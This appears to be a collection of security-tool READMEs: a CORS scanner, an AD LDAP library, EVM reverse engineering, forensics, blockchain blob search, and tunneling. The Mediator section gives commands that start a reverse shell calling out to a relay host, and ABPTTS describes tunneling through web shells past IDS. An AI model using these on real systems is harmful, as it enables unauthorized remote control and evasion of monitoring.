Verify that the Cross-Origin Resource Sharing (CORS) Access-Control-Allow-Origin header uses a strict allow list of trusted domains and subdomains to match against and does not support the "null" origin.


How Does corsair_scan work?

Corsair_scan works by resending a request (or list of requests) received as a parameter, injecting a value into the Origin header. Depending on the content of the Access-Control-Allow-Origin header in the response, we can assert whether the CORS configuration is correct. There are three scenarios that indicate that CORS is misconfigured:

  • The fake origin sent in the request is reflected in Access-Control-Allow-Origin
  • The value of Access-Control-Allow-Origin is *
  • The value of Access-Control-Allow-Origin is null

If CORS is found to be misconfigured, we check to see if the response contains the header Access-Control-Allow-Credentials, which means that the server allows credentials to be included on cross-origin requests.

Often, CORS configurations make use of wildcards, for example accepting anything matching *example.com*. This means that the origin example.com.evil.com will be accepted, as it matches the given regex. To try and combat this, corsair_scan tests four scenarios:

  • Fake domain injection: we set the Origin header to https://scarymonster.com, even if the original request doesn't have an Origin header
  • If the original request has an Origin header (for clarity, let's assume it is https://example.com), three wildcard-abuse variants are also tested:
    • Sub-domain injection: https://scarymonster.example.com
    • Pre-domain injection: https://scarymonsterexample.com
    • Post-domain injection: https://example.com.scarymonster.com
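The core of each test boils down to a reflection check. A minimal sketch of the idea (not corsair_scan's actual code; URL and origin are placeholders), flagging a response whose Access-Control-Allow-Origin is the injected origin, *, or null:

import requests

# Inject a fake origin and flag the response if the server reflects it,
# answers with '*', or answers with 'null'.
FAKE_ORIGIN = "https://scarymonster.com"
resp = requests.get("https://example.com/", headers={"Origin": FAKE_ORIGIN}, verify=True)
acao = resp.headers.get("Access-Control-Allow-Origin")
misconfigured = acao in (FAKE_ORIGIN, "*", "null")
credentials = resp.headers.get("Access-Control-Allow-Credentials") == "true"
print({"misconfigured": misconfigured, "credentials": credentials, "acao": acao})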

How Do I Install It?

This project was developed with Python 3.9, but should work with any Python 3.x version.

corsair_scan has been designed to be used as a Python module, so the easiest way to install it is using pip.

pip3 install corsair_scan --user


How Do I Use It?

At the moment, corsair_scan is intended to be used as a Python package. However, we plan to release this as a command line tool (CLI) in future releases.

The method that performs the CORS scan is corsair_scan. Here is its definition:


corsair_scan

Receives a list of requests and a parameter to enable/disable certificate verification for the requests

Input:

  • data [List]: A list of requests. Each request is a dictionary that contains the relevant data for the request:

    • url_data [Dict]: This is a dictionary that contains all the relevant data for the request:
      • url [String]: This is the url where the request is sent
      • verb [String]: The verb for the request (get, post, patch, delete, options...)
      • params [String]: The body sent in the request (if any)
      • headers [Dict]: This is a dict with all the headers included in the request
  • verify [Boolean] [Default: True]: Sends this value to corsair_scan_single_url for each request

Output:

  • final_report [List]: Contains the full report for the test performed. If filter is set to true, it also adds a summary of the test to the report.
    • report [List]: List of detailed individual reports with the test performed
    • summary [Dict] : Summary of the issues detected in the scan

Example
import corsair_scan
url_data = {}
data = []
verb = 'GET'
url = 'https://example.com/'
params = 'user=user1&password=1234'
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-GB,en;q=0.5', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1',
'Origin': 'https://example.com',
'Host': 'example.com'}

url_data['verb'] = verb
url_data['url'] = url
url_data['params'] = params
url_data['headers'] = headers
data.append(url_data)

print(corsair_scan.corsair_scan(data, verify=True))

Response:

{'report': [{'fake_origin': {'Access-Control-Allow-Origin': 'https://scarymonster.com',
             'Origin': 'https://scarymonster.com',
             'credentials': True,
             'error': False,
             'misconfigured': True,
             'status_code': 200},
             'post-domain': {'Access-Control-Allow-Origin': 'https://example.com.scarymonster.com',
             'Origin': 'https://example.com.scarymonster.com',
             'credentials': True,
             'error': False,
             'misconfigured': True,
             'status_code': 200},
             'pre-domain': {'Access-Control-Allow-Origin': 'https://scarymonsterexample.com',
             'Origin': 'https://scarymonsterexample.com',
             'credentials': True,
             'error': False,
             'misconfigured': True,
             'status_code': 200},
             'sub-domain': {'Access-Control-Allow-Origin': 'https://scarymonster.example.com',
             'Origin': 'https://scarymonster.example.com',
             'credentials': True,
             'error': False,
             'misconfigured': True,
             'status_code': 200},
             'url': 'https://example.com/',
             'verb': 'GET'}],
 'summary': {'error': [], 'misconfigured': [{'credentials': True,
             'misconfigured_test': ['fake_origin',
                                    'sub-domain',
                                    'pre-domain',
                                    'post-domain'],
             'status_code': 200,
             'url': 'https://example.com/',
             'verb': 'GET'}]}}

Roadmap
  • Release corsair_scan as a CLI tool
  • Read url data from a text file
  • Improve reports format

Who Is Behind It?

Corsair_scan was developed by the Santander UK Security Engineering team.



Mediator - An Extensible, End-To-End Encrypted Reverse Shell With A Novel Approach To Its Architecture



Mediator is an end-to-end encrypted reverse shell in which the operator and the shell connect to a "mediator" server that bridges the connections. This removes the need for the operator/handler to set up port forwarding in order to listen for the connection. Mediator also allows you to create plugins to expand the functionality of the reverse shell.

You can run Mediator's scripts as standalone executables or you can import them for integration into other pentesting and incident response tools.


Architecture:

Inspired by end-to-end encrypted chat applications, Mediator takes a unique approach to the client/server model of a reverse shell. Mediator uses:

  1. A client reverse shell
  2. A client handler/operator
  3. A server that bridges the two connections

Reverse shells and handlers connect to the Mediator server with a connection key. The server listens on port 80 for handler connections and port 443 for reverse shell connections. When clients connect to the mediator, the server queues the clients according to their respective type and connection key. When both a reverse shell and an operator connect to the server with the same key, the server will bridge the two connections. From there, a key exchange is done between the two clients, and all communication between the reverse shell and operator is encrypted end-to-end. This ensures the server cannot snoop on the streams it is piping.
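As an illustration of the matchmaking idea, here is a simplified sketch, not Mediator's actual implementation and with made-up names: queue the first client per (role, connection key) pair, then pipe bytes between the two sockets once the counterpart arrives. Because the clients encrypt end-to-end, a bridge like this only ever relays ciphertext.

import asyncio

# (role, connection_key) -> (reader, writer) for clients awaiting a match.
pending = {}

async def pipe(reader, writer):
    # Relay bytes one way until the source closes.
    try:
        while data := await reader.read(4096):
            writer.write(data)
            await writer.drain()
    finally:
        writer.close()

async def handle(role, key, reader, writer):
    # In the real server the role is implied by the port the client hit
    # (80 for handlers, 443 for reverse shells) and the key is read from
    # the connection itself.
    other = "handler" if role == "shell" else "shell"
    if (other, key) in pending:
        peer_reader, peer_writer = pending.pop((other, key))
        await asyncio.gather(pipe(reader, peer_writer),
                             pipe(peer_reader, writer))
    else:
        pending[(role, key)] = (reader, writer)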


Plugins

Plugins allow you to add extra commands that can execute code on the operator's host, the target host, or both! Please refer to the README in the plugins directory for more information about plugins.


Instructions:

Server

The client scripts can be run on Windows or Linux, but you'll need to stand up the server (mediator.py) on a Linux host. The server is pure Python, so no dependencies need to be installed. You can either run the server script with

$ python3 mediator.py

or you can build a Docker image with the provided Dockerfile and run it in a container (make sure to publish ports 80 and 443).


Clients

You will need to install the dependencies found in requirements.txt for the clients to work. You can do this with the following command:

$ pip3 install -r requirements.txt

See Tips and Reminders at the bottom for help on distributing the clients without worrying about dependencies.

The handler and the reverse shell can be used within other Python scripts or directly via the command line. In both cases, the clients can accept arguments for the server address and connection key. Usage of those arguments is described below.

Mediator server address

For Python script usage, the address of the mediator host is required upon instantiation:

Handler class

from handler import Handler

operator = Handler(mediatorHost="example.com")
operator.run()

WindowsRShell class

from windowsTarget import WindowsRShell

shell = WindowsRShell(mediatorHost="example.com")
shell.run()

If executing a client script directly from a shell, you can either hard code the address at the bottom of the script, or the server address can be specified as an argument with the -s or --server flag:

handler.py

$ python3 handler.py -s example.com

windowsTarget.py

> python windowsTarget.py -s example.com

Connection key

When two handlers or two reverse shells connect to the mediator server with the same connection key, only the first connection is queued awaiting its match. Until the queued connection either times out (30 seconds) or matches with a counterpart connection, all other clients of the same type trying to connect with the same connection key will be dropped.

It is important to make sure each handler is using a unique connection key to avoid a race condition resulting in the wrong shell being given to an operator.

Only keys with the prefix "#!ConnectionKey_" will be accepted by the server. The default connection key is "#!ConnectionKey_CHANGE_ME!!!".
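Since the Tips section below recommends a randomly generated key per session, a short sketch along these lines can produce one (the prefix is the only hard requirement; the key length is an arbitrary choice):

import secrets

# Generate a per-session connection key with the required prefix.
connection_key = "#!ConnectionKey_" + secrets.token_urlsafe(16)
print(connection_key)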

To change the connection key for Python script usage, the connection key can optionally be supplied upon instantiation:

Handler class

from handler import Handler

operator = Handler(mediatorHost="example.com", connectionKey="#!ConnectionKey_secret_key")
operator.run()

LinuxRShell class

from linuxTarget import LinuxRShell

shell = LinuxRShell(mediatorHost="example.com", connectionKey="#!ConnectionKey_secret_key")
shell.run()

If executing a client script directly from a shell, you can either hard code the connection key at the bottom of the script, or the connection key can be specified as an argument with the -c or --connection-key flag:

handler.py

$ python3 handler.py -s example.com -c '#!ConnectionKey_secret_key'

windowsTarget.py

> python windowsTarget.py -s example.com -c '#!ConnectionKey_secret_key'

Tips and Reminders:
  • REMINDER: handlers and reverse shells will not be bridged together unless they connect to the mediator server using the same connection key within 30 seconds of each other.
  • TIP: You can easily create an exe for windowsTarget.py with pyinstaller using the --onefile flag
  • TIP: For security, you should use a randomly generated connection key for each session. If a malicious party learns your connection key and spams the operator port with it, your operator client will be unable to connect (the server does not allow duplicate connections), and they will be connected to your target's shell.



Msldap - LDAP Library For Auditing MS AD



msldap

LDAP library for MS AD


Documentation

Awesome documentation here!


Features
  • Comes with a built-in console LDAP client
  • All parameters can be controlled via a convenient URL (see below)
  • Supports integrated windows authentication (SSPI) both with NTLM and with KERBEROS
  • Supports channel binding (for ntlm and kerberos not SSPI)
  • Supports encryption (for NTLM/KERBEROS/SSPI)
  • Supports LDAPS (TODO: actually verify certificate)
  • Supports SOCKS5 proxy without the need for an extra proxifier
  • Minimal footprint
  • A lot of pre-built queries for convenient information polling
  • Easy to integrate to your project
  • No testing suite

Installation

Via GIT:
python3 setup.py install
Or via pip:
pip install msldap


Prerequisites
  • winsspi module. For windows only. This supports SSPI based authentication.
  • asn1crypto module. Some LDAP queries incorporate ASN1 structures to be sent on top of the ASN1 transport XD
  • asysocks module. To support socks proxying.
  • aiocmd For the interactive client
  • asciitree For plotting nice trees in the interactive client

Usage

Please note that this is a library, and it was not intended to be used as a command line program.
With this noted, the project packs a fully functional interactive LDAP client. When installing the msldap module with setup.py install, a new binary called msldap will appear (shocking naming conventions)


LDAP connection URL

A major change was needed in version 0.2.0 to unify the different connection options into one single string, without the need for additional command line switches.
The new connection string is composed in the following manner:
<protocol>+<auth_method>://<domain>\<username>:<password>@<ip>:<port>/?<param>=<value>&<param>=<value>&...
Detailed explanation with examples:

<protocol>+<auth>://<username>:<password>@<ip_or_host>:<port>/<tree>/?<param>=<value>


<protocol> sets the ldap protocol. The following values are supported:
- ldap
- ldaps

<auth> can be omitted if plaintext authentication is to be performed (in that case it defaults to ntlm-password), otherwise:
- ntlm-password
- ntlm-nt
- kerberos-password (dc option param must be used)
- kerberos-rc4 / kerberos-nt (dc option param must be used)
- kerberos-aes (dc option param must be used)
- kerberos-keytab (dc option param must be used)
- kerberos-ccache (dc option param must be used)
- sspi-ntlm (windows only!)
- sspi-kerberos (windows only!)
- anonymous
- plain
- simple
- sicily (same format as ntlm-nt but using the SICILY authentication)

<tree>:
OPTIONAL. Specifies the root tree of all queries

<param> can be:
- timeout : connection timeout in seconds
- proxytype: currently only socks5 proxy is supported
- proxyhost: Ip or hostname of the proxy server
- proxyport: port of the proxy server
- proxytimeout: timeout in seconds for the proxy connection
- dc: the IP address of the domain controller, MUST be used for kerberos authentication

Examples:
ldap://10.10.10.2 (anonymous bind)
ldaps://test.corp (anonymous bind)
ldap+sspi-ntlm://test.corp
ldap+sspi-kerberos://test.corp
ldap://TEST\\victim:<password>@10.10.10.2 (defaults to SASL GSSAPI NTLM)
ldap+simple://TEST\\victim:<password>@10.10.10.2 (SASL SIMPLE auth)
ldap+plain://TEST\\victim:<password>@10.10.10.2 (SASL SIMPLE auth)
ldap+ntlm-password://TEST\\victim:<password>@10.10.10.2
ldap+ntlm-nt://TEST\\victim:<nthash>@10.10.10.2
ldap+kerberos-password://TEST\\victim:<password>@10.10.10.2
ldap+kerberos-rc4://TEST\\victim:<rc4key>@10.10.10.2
ldap+kerberos-aes://TEST\\victim:<aes>@10.10.10.2
ldap://TEST\\victim:password@10.10.10.2/DC=test,DC=corp/
ldap://TEST\\victim:password@10.10.10.2/DC=test,DC=corp/?timeout=99&proxytype=socks5&proxyhost=127.0.0.1&proxyport=1080&proxytimeout=44

Kudos


Ghidra-Evm - Module For Reverse Engineering Smart Contracts



In the last few years, attacks on smart contracts deployed in the Ethereum blockchain have resulted in a significant amount of stolen funds due to programming mistakes. Since smart contracts, once compiled and deployed, are complex to modify and update, different practitioners have suggested the importance of reviewing their security in the blockchain, where only Ethereum Virtual Machine (EVM) bytecode is available. In this respect, reverse engineering through disassembly and decompilation can be effective.


ghidra-EVM is a Ghidra module for reverse engineering smart contracts. It can be used to download Ethereum Virtual Machine (EVM) bytecode from the Ethereum blockchain and disassemble and decompile the smart contract. Further, it can analyze creation code, find contract methods and locate insecure instructions.

It comprises a processor module, custom loader and plugin(s) that disassembles Ethereum VM (EVM) bytecode and generates a control-flow graph (CFG) of a smart contract.

The last version uses the Ghidra 9.1.2 API. It relies on the crytic evm_cfg_builder library (https://github.com/crytic/evm_cfg_builder) to assist Ghidra in the CFG generation process.

Ghidra-evm consists of:

  • A loader that reads byte and hex code from .evm and .evm_h files respectively (See examples).
  • The SLEIGH definition of the EVM instruction set taking into account the Ghidra core limitations (See Notes).
  • A helper script that uses evm_cfg_builder and ghidra_bridge to assist Ghidra in generating the CFG and exploring the function properties of a smart contract.
  • A collection of scripts that help reverse engineer different aspects of a smart contract:
Script | Description
search_codecopy.py | When analyzing creation code in a smart contract we can only see the _dispatcher function, which uses CODECOPY to write the runtime code into memory. This script looks for useful CODECOPY instructions and finds the smart contract methods hidden in the runtime part of the contract.
search_dangerous_instructions.py | Instructions such as CALL, CALLCODE, SELFDESTRUCT and DELEGATECALL can sometimes be abused to transfer funds to another contract. This script finds them and creates a label for each occurrence.
load_external_contract.py | Downloads smart contract byte code from the blockchain into a .evm_h file that can be loaded into ghidra-evm

Installation instructions

Compilation instructions

The contents of the ghidra-evm directory can be used to create a Ghidra module in Eclipse with processor and loader in order to extend or debug ghidra_evm.


Tutorials



Tutorial | Description
Utilization | Simple utilization instructions with test.evm
Analyzing creation bytecode | Using search_codecopy.py to analyze creation code and find hidden methods
Looking for dangerous instructions | Using search_dangerous_instructions.py to analyze a SELFDESTRUCT occurrence
Downloading smart contract bytecode from the blockchain into Ghidra | Using load_external_contract.py to download EVM byte code from the blockchain into a .evm_h file

Integration with external symbolic execution tools
Script | Description
teether | It marks the critical path in Ghidra before generating the exploit. Requires teether.

Notes
  • The CFG is created according to evm_cfg_builder: JUMP and JUMPI instructions are utilized.
  • A jump table of 32x32 (evm_jump_table) is generated accordingly in order to detect and show branches in the disassembly and control flow windows.
  • Ghidra has not been designed to deal with architectures and memories of wordsize > 64-bit. This means that instructions such as PUSH32 are not correctly shown in the decompilation window.

License

Ghidra-evm is licensed and distributed under the AGPLv3.


Thanks

This work was supported by the European Commission through the H2020 Programme’s Project M-Sec under Grant 814917.



IPED - Digital Forensic Tool - Process And Analyze Digital Evidence, Often Seized At Crime Scenes By Law Enforcement Or In A Corporate Investigation By Private Examiners


IPED is an open source software that can be used to process and analyze digital evidence, often seized at crime scenes by law enforcement or in a corporate investigation by private examiners.


Introduction

IPED - Digital Evidence Processor and Indexer (translated from Portuguese) is a tool implemented in Java, developed since 2012 by digital forensic experts from the Brazilian Federal Police and still maintained by them. Although it was always open source, its code was only officially published in 2019.

Since the beginning, the goal of the tool was efficient data processing and stability. Some key characteristics of the tool are:

  • Command line data processing for batch case creation
  • Multiplatform support, tested on Windows and Linux systems
  • Portable cases without installation, you can run them from removable drives
  • Integrated and intuitive analysis interface
  • High multithread performance and support for large cases: up to 135 million items as of 12/12/2019

Currently IPED uses the Sleuthkit library only to decode disk images and file systems, so the same image formats are supported: RAW/DD, E01, ISO9660, AFF, VHD, VMDK. There is also support for the UDF (ISO), AD1 (AccessData) and UFDR (Cellebrite) formats. Recently, support for APFS was added, thanks to BlackBag's implementation for the Sleuthkit.

If you are new to the tool, please refer to the Beginner's Start Guide.


Building

To build from source, you need git, maven and java 8 (Oracle or OpenJDK+JFX) installed. Run:

git clone https://github.com/sepinf-inc/IPED.git
cd IPED
mvn install

It will generate a snapshot version of IPED in target/release folder.

On Linux you must also build The Sleuthkit and additional dependencies. Please refer to the Linux section.

If you want to contribute to the project, refer to Contributing


Features

Some of IPED's many features are listed below:

  • Supported hashes: md5, sha-1, sha-256, sha-512 and edonkey. PhotoDNA is also available for law enforcement (please contact iped@dpf.gov.br)
  • Fast hash deduplication, NIST NSRL, ProjectVIC and LED hashset lookup
  • Signature analysis
  • Categorization by file type and properties
  • Recursive container expansion of dozens of file formats
  • Image and video gallery for hundreds of formats
  • Georeferencing of GPS data (needs Google Maps Javascript API key)
  • Regex searches with optional script validation for credit cards, emails, urls, money values, bitcoin, ethereum, ripple wallets...
  • Embedded hex, unicode text, metadata and native viewers
  • File content and metadata indexing and fast searching, including unknown files and unallocated space
  • Efficient data carving engine (takes < 10% processing time) that scans much more than unallocated, with support for +40 file formats, including videos, extensible by scripting
  • Optical Character Recognition powered by tesseract 4
  • Encryption detection for known formats and using entropy test
  • Processing profiles: forensic, pedo (csam), triage, fastmode (preview) and blind (for automatic data extraction)
  • Detection for +70 languages
  • Named Entity Recognition (needs Stanford CoreNLP models to be downloaded)
  • Customizable filters based on any file metadata
  • Similar document search with configurable threshold
  • Similar image search, using internal or external image
  • Powerful file grouping (clustering) based on ANY metadata
  • Support for multicases up to 135 million items
  • Extensible with javascript and python (including cpython extensions) scripts
  • External command line tools integration for file decoding
  • Browser history for Edge, Firefox, Chrome and Safari
  • Custom parsers for Emule, Shareaza, Ares, WhatsApp, Skype, Telegram, Bittorrent, ActivitiesCache, and more...
  • Fast nudity detection for images and videos using random forests algorithm (thanks to its author Wladimir Leite)
  • Nudity detection using Yahoo open-nsfw deeplearning model (needs keras and jep)
  • Audio Transcription, implementations with Azure and Google Cloud services
  • Graph analysis for communications (calls, emails, instant messages...)
  • Stable processing with out-of-process file system decoding and file parsing
  • Resuming or restarting of stopped or aborted processing (--continue/--restart options)
  • Web API for searching remote cases, get file metadata, raw content, decoded text, thumbnails and posting bookmarks
  • Creation of bookmarks/tags for interesting data
  • HTML, CSV reports and portable cases with tagged data


Etherblob-Explorer - Search And Extract Blob Files On The Ethereum Blockchain Network



Search and extract blob files on the Ethereum network using Etherscan.io API.


Introduction

EtherBlob Explorer is a tool intended for researchers, analysts, CTF players or anyone curious enough to search for different kinds of files or any meaningful human-supplied data on the Ethereum Blockchain Network. It searches over a user-supplied range of block IDs or UNIX timestamps on any of the 5 available networks: MainNet, Görli, Kovan, Rinkeby and Ropsten.

For a real-life case you can read this experiment made in 2017. The immutability of the blockchain can truly be a double-edged sword.


Installation

Run the following command:

$ pip install git+https://github.com/litneet64/etherblob-explorer.git

Now it's ready to use from your CLI, you can find some common usage examples below!


Features
Networks

Search on any of the five Ethereum Networks:

  • MainNet
  • Görli
  • Kovan
  • Rinkeby
  • Ropsten

Search Locations

This tool can search in the following locations, either separately or in any combination on the same run:

  • Transaction Input Data: search inside transaction's input data (default location).
  • Block Input Data: search inside block's input data.
  • Contract Storage: search inside a contract's storage array on the first N 32-byte sized positions, treating it all as one big data string.
  • To Addresses: search appending 'to' addresses as the possible input [*] (checking first for file headers and re-checking once all data is harvested using binwalk).

[*] Storing data in 'to' addresses is possible on the Ethereum network because there is no verification that the destination address has associated account keys. This means you can make transactions to arbitrary addresses to craft a payload over several 20-byte sized transactions (it's very rare, but so are some CTF challenges).


Search and Extraction Methods

All of these methods can be used either separately or in any combination:

  • Embedded Files: search for files embedded inside data using binwalk.
  • File Headers / Magic Bytes: search using headers + magic bytes by leveraging the Linux util file (default method).
  • ASCII String Dump: search for ASCII strings inside data.
  • Entropy-Based Search: use Shannon's entropy as a measure to search for natural-language text (e.g. UTF-8 Unicode), encrypted/compressed files, or anything the user deems viable with user-supplied entropy limits (see the sketch after the note below).

IMPORTANT: The order shown here is used under the hood to discard searches with later methods (e.g. if a file is found via embedded-file search, it won't attempt to search using file headers, ASCII string dump, or entropy), as it's not likely to find anything meaningful if an earlier method was already successful.
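For reference, the entropy measure itself is simple to compute. A quick sketch, with the thresholds quoted from the manual below: roughly 3.5-5.0 bits/byte for natural-language text and 7.0-8.0 for encrypted/compressed data:

import math
from collections import Counter

# Shannon entropy in bits per byte: low for repetitive text, 8.0 for a
# perfectly uniform byte distribution.
def shannon_entropy(data: bytes) -> float:
    counts = Counter(data)
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in counts.values())

print(shannon_entropy(b"hello hello hello"))  # low: repetitive ASCII text
print(shannon_entropy(bytes(range(256))))     # 8.0: uniform byte distribution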


Misc
  • Accepts UNIX timestamps (instead of block IDs) that get resolved into the closest block IDs committed at those times (see the sketch after this list).
  • Saves all data from visited transactions into a file for later review.
  • Stores CLI-displayed logs into a file for later extracted-file analysis.
  • Ignores user-supplied file formats (case-insensitive) for extraction, and accepts substrings of the complete file format for blacklisting.
  • Prints general progress metrics (e.g. how many blocks / transactions have been parsed, how many blocks are left) every minute, and also displays some interesting metrics at the end of the current run.
  • More useful features can be found in the manual (-h)!
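For the timestamp resolution mentioned above, Etherscan exposes a block-by-timestamp lookup. A sketch of that call follows; the API key is a placeholder, and this illustrates the kind of request the -t option relies on rather than etherblob's exact internals:

import requests

# Resolve a UNIX timestamp to the closest block committed before it using
# the Etherscan API (module=block&action=getblocknobytime).
resp = requests.get(
    "https://api.etherscan.io/api",
    params={
        "module": "block",
        "action": "getblocknobytime",
        "timestamp": 1611601200,
        "closest": "before",
        "apikey": "YOUR_API_KEY",
    },
)
print(resp.json()["result"])  # block number closest before that time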

Usage

Common use cases
  • Standard search (search inside transactions via file headers) on MainNet with API key on default location (.api-key) and between these two block IDs (inclusive):
$ etherblob 4081599 4081600
  • More in-depth search (search for embedded files + the regular search method) on the goerli network with the key inside an arbitrary file:
$ etherblob -K api.key 3134050 3145570 -M -H --network goerli
  • Search over block headers and transactions at the same time and save extracted files to 'extracted':
$ etherblob 4081599 4081600 --blocks --transactions -D extracted/
  • Search only inside 'to' addresses in blocks committed between Jan 25 2021 19:00:00 and Jan 26 2021 19:00:00:
$ etherblob -t 1611601200 1611687600 --addresses
  • Search strings only on contracts' storage and for the first 4 storage array positions (128 bytes worth of data):
$ etherblob 3911697 3912697 -S --contracts -C 4
  • Search only inside transactions for encrypted/compressed data (ignoring any other file format):
$ etherblob 4081599 4081600 --encrypted
  • Search inside transactions for custom entropy files while saving transactions into file:
$ etherblob 3911697 3912697 -E 4.0 5.0 -s
  • Only dump ASCII strings over blocks and transactions made on Christmas Eve (between the 24th and 25th):
$ etherblob -t 1608836400 1608922800 --blocks --transactions --strings
  • Full-blown search (slow, expect many false-positives):
$ etherblob 4081599 4081600 -U -S -M -H --blocks --transactions --addresses --contracts

Advanced Use Cases

There are more explanations for advanced usage cases and the things found with them on the wiki!


Manual
usage: etherblob [-h] [--transactions] [--blocks] [--addresses] [--contracts]
[--network {main,goerli,kovan,rinkeby,ropsten}] [-H] [-M] [-U] [-E CUSTOM_ENTROPY CUSTOM_ENTROPY]
[--encrypted] [-S] [-C CONTRACT_POSITION] [-t] [-K API_KEY_PATH] [-k API_KEY] [-D OUTPUT_DIR]
[-o OUT_LOG] [-s] [-i [IGNORED_FMT [IGNORED_FMT ...]]] [--version]
start_block end_block

Tool to search and extract blob files on the Ethereum Network.

positional arguments:
start_block Start of block id range.
end_block End of block id range.

optional arguments:
-h, --help show this help message and exit
--transactions Search for blob files on transaction inputs. Default search mode.
--blocks Search for blob files on block inputs. If enabled then transaction input check is disabled unless
explicitly enabled.
--addresses Search for blob files on 'to' transaction addresses, as on Ethereum anyone can make transactions
to an arbitrary address even if it has no related owner (still not very common). If enabled then
transaction's input check is disabled unless explicitly enabled.
--contracts Search for blob files on contract's storage. If enabled then transaction input check is disabled
unless explicitly enabled.
--network {main,goerli,kovan,rinkeby,ropsten}, -N {main,goerli,kovan,rinkeby,ropsten}
Choose blockchain network to search in. Available choices are Main, Goerli (Görli), Kovan, Rinkeby
and Ropsten. MainNet is the default network. Case-insensitive.
-H, --file-header If enabled, search for file formats via magic bytes/file headers on data (from blocks,
transactions or addresses). Enabled by default unless another method is enabled too.
-M, --embedded If enabled, search for embedded files on data (from blocks, transactions or addresses) via
binwalk. Disabled by default as parsing now takes longer.
-U, --unicode If enabled, attempt to search and dump files containing UTF-8 text from harvested data (blocks,
transactions, addresses) using Shannon's Entropy (between 3.5 and 5.0) if no other discernible
file is found first on that data. Yields many false positives.
-E CUSTOM_ENTROPY CUSTOM_ENTROPY, --custom-entropy CUSTOM_ENTROPY CUSTOM_ENTROPY
Define your own entropy limits (min and max) to search for files/data on harvested data.
--encrypted If enabled, attempt to search and dump encrypted/compressed data found via different search
methods (blocks, transactions, addresses) using Shannon's Entropy (between 7.0 and 8.0) if no
other discernible file is found first on that data.
-S, --strings If enabled, attempt to search and dump ASCII strings into files found inside harvested data
(blocks, transactions, addresses) if no other discernible file is found first on that data.
-C CONTRACT_POSITION, --contract-position CONTRACT_POSITION
Search inside contract's data until reaching the (N-1)th position on its storage array. Positions
contain 32 bytes worth of data. Count starts at 0 and default pos is the 15th pos (16 indexes in
total) if no custom position is given.
-t, --timestamps If enabled, then start and end block IDs are interpreted as UNIX timestamps that are then resolved
to the closest commited blocks for those specific times.
-K API_KEY_PATH, --api-key-path API_KEY_PATH
Path to file with Etherscan API key for queries. Default search location is '.api-key'.
-k API_KEY, --api-key API_KEY
Etherscan API key as parameter. If given then '--api-key-path' is ignored.
-D OUTPUT_DIR, --output-dir OUTPUT_DIR
Out-dir for extracted files. Default is 'ext_{start block}-{end block}'.
-o OUT_LOG, --out-log OUT_LOG
Out-file for logs. Default is 'etherblob_{start block}-{end block}.log'.
-s, --save-transactions
If enabled, all transactions and their info are stored at file 'transactions_{start-block}-{end-
block}.txt'
-i [IGNORED_FMT [IGNORED_FMT ...]], --ignored-fmt [IGNORED_FMT [IGNORED_FMT ...]]
Ignored file formats for extraction. Default ignored/common file formats are 'ISO-8859 text' and
'Non-ISO extended-ASCII text'. The 'data' file format is always ignored. Accepts file format
substrings and makes case-insensitive matches. '*' is a wildcard to ignore all file formats.
--version show program's version number and exit

Official GitHub repo 'https://github.com/litneet64/etherblob-explorer'


ABPTTS - TCP Tunneling Over HTTP/HTTPS For Web Application Servers



A Black Path Toward The Sun

(TCP tunneling over HTTP for web application servers)

https://www.blackhat.com/us-16/arsenal.html#a-black-path-toward-the-sun

Ben Lincoln, NCC Group, 2016

ABPTTS uses a Python client script and a web application server page/package[1] to tunnel TCP traffic over an HTTP/HTTPS connection to a web application server. In other words, anywhere that one could deploy a web shell, one should now be able to establish a full TCP tunnel. This permits making RDP, interactive SSH, Meterpreter, and other connections through the web application server.


The communication is designed to be fully compliant with HTTP standards, meaning that in addition to tunneling in through a target web application server, it can be used to establish an outbound connection through packet-inspecting firewalls.

A number of novel features are used to make detection of its traffic challenging. In addition to its usefulness to authorized penetration testers, it is intended to provide IDS/IPS/WAF developers with a safe, live example of malicious traffic that evades simplistic regex-pattern-based signature models.

An extensive manual is provided in PDF form, and walks the user through a variety of deployment scenarios.

This tool is released under version 2 of the GPL.

[1] Currently JSP/WAR and ASP.NET server-side components are included.

Compare and contrast with:

Named as an oblique reference to Cordyceps/Ophiocordyceps, e.g.: http://www.insectimages.org/browse/detail.cfm?imgnum=0014287


